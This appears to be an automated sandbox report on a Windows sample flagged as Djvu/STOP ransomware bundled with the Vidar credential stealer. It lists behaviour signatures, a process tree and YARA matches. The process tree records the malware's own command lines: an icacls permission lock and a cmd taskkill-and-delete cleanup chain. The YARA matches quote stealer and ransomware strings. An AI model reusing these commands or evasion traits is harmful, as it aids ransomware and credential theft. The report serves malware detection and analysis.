Edit tour

Windows Analysis Report
Q5W0I0pzFI

Overview

General Information

Sample Name:	Q5W0I0pzFI (renamed file extension from none to exe)
Analysis ID:	598825
MD5:	78ada58842629a7c72f4ffa09877332d
SHA1:	b23c9b062b87df292edfb0c10ad83d1c26a91d37
SHA256:	79a45215fb18155b4ce7d6d4cde5351b7da9d25b0850431fd7f1b8373e9041b8
Tags:	exe
Infos:

Detection

Djvu Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Vidar

Found ransom note / readme

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Djvu Ransomware

Yara detected Vidar stealer

Tries to steal Mail credentials (via file / registry access)

Infects executable files (exe, dll, sys, html)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Injects a PE file into a foreign processes

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Possible FUD Crypter (malicious underground PE packer) detected

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Machine Learning detection for dropped file

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Sigma detected: Suspicious Del in CommandLine

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Contains functionality to check if a debugger is running (IsDebuggerPresent)

PE file contains sections with non-standard names

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

Enables debug privileges

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

Uses cacls to modify the permissions of files

Contains functionality to launch a program with higher privileges

Uses taskkill to terminate processes

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to query network adapater information

Sigma detected: Autorun Keys Modification

Classification

Process Tree

System is w10x64

Q5W0I0pzFI.exe (PID: 6988 cmdline: "C:\Users\user\Desktop\Q5W0I0pzFI.exe" MD5: 78ADA58842629A7C72F4FFA09877332D)

Q5W0I0pzFI.exe (PID: 6496 cmdline: "C:\Users\user\Desktop\Q5W0I0pzFI.exe" MD5: 78ADA58842629A7C72F4FFA09877332D)

icacls.exe (PID: 7052 cmdline: icacls "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: FF0D1D4317A44C951240FAE75075D501)

Q5W0I0pzFI.exe (PID: 2420 cmdline: "C:\Users\user\Desktop\Q5W0I0pzFI.exe" --Admin IsNotAutoStart IsNotTask MD5: 78ADA58842629A7C72F4FFA09877332D)

Q5W0I0pzFI.exe (PID: 1516 cmdline: "C:\Users\user\Desktop\Q5W0I0pzFI.exe" --Admin IsNotAutoStart IsNotTask MD5: 78ADA58842629A7C72F4FFA09877332D)

build2.exe (PID: 3232 cmdline: "C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe" MD5: 1B28A890F243870FE2292DB97E0DC6A8)

build2.exe (PID: 2304 cmdline: "C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe" MD5: 1B28A890F243870FE2292DB97E0DC6A8)

cmd.exe (PID: 7136 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe" & del C:\ProgramData\*.dll & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 6488 cmdline: taskkill /im build2.exe /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

timeout.exe (PID: 7148 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

Q5W0I0pzFI.exe (PID: 2624 cmdline: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe --Task MD5: 78ADA58842629A7C72F4FFA09877332D)

Q5W0I0pzFI.exe (PID: 6452 cmdline: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe --Task MD5: 78ADA58842629A7C72F4FFA09877332D)

audiodg.exe (PID: 6452 cmdline: C:\Windows\system32\AUDIODG.EXE 0x258 MD5: 0B245353F92DF527AA7613BA2C0DA023)

Q5W0I0pzFI.exe (PID: 6444 cmdline: "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart MD5: 78ADA58842629A7C72F4FFA09877332D)

Q5W0I0pzFI.exe (PID: 4356 cmdline: "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart MD5: 78ADA58842629A7C72F4FFA09877332D)

Q5W0I0pzFI.exe (PID: 3884 cmdline: "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart MD5: 78ADA58842629A7C72F4FFA09877332D)

Q5W0I0pzFI.exe (PID: 4892 cmdline: "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart MD5: 78ADA58842629A7C72F4FFA09877332D)

cleanup

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000011.00000000.440924056.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000011.00000000.440924056.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000011.00000000.440924056.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x92dbc:$s1: JohnDoe 0x92db4:$s2: HAL9TH
00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x970c0:$s1: "os_crypt":{"encrypted_key":" 0x9c9ec:$s2: screenshot.jpg 0x92edc:$s3: Content-Disposition: form-data; name="
00000011.00000000.442768730.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000011.00000000.442768730.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000011.00000000.442768730.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000000E.00000002.443184241.0000000002160000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.443184241.0000000002160000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000008.00000000.396193499.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000008.00000000.396193499.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000008.00000000.396193499.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000000B.00000000.413315089.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
0000000B.00000000.413315089.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000B.00000000.413315089.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000008.00000000.396613760.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000008.00000000.396613760.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000008.00000000.396613760.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000002.00000000.369557747.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000002.00000000.369557747.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000002.00000000.369557747.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000009.00000000.409130512.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000009.00000000.409130512.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000009.00000000.409130512.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x92dbc:$s1: JohnDoe 0x92db4:$s2: HAL9TH
00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x970c0:$s1: "os_crypt":{"encrypted_key":" 0x9c9ec:$s2: screenshot.jpg 0x92edc:$s3: Content-Disposition: form-data; name="
0000000F.00000002.447804234.0000000002220000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000B.00000000.417180790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
0000000B.00000000.417180790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000B.00000000.417180790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000010.00000000.441196646.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000000.441196646.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000010.00000000.441196646.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x92dbc:$s1: JohnDoe 0x92db4:$s2: HAL9TH
00000010.00000000.441196646.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x970c0:$s1: "os_crypt":{"encrypted_key":" 0x9c9ec:$s2: screenshot.jpg 0x92edc:$s3: Content-Disposition: form-data; name="
00000009.00000002.440072220.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000009.00000002.440072220.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000009.00000002.440072220.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000002.00000000.370049298.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000002.00000000.370049298.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
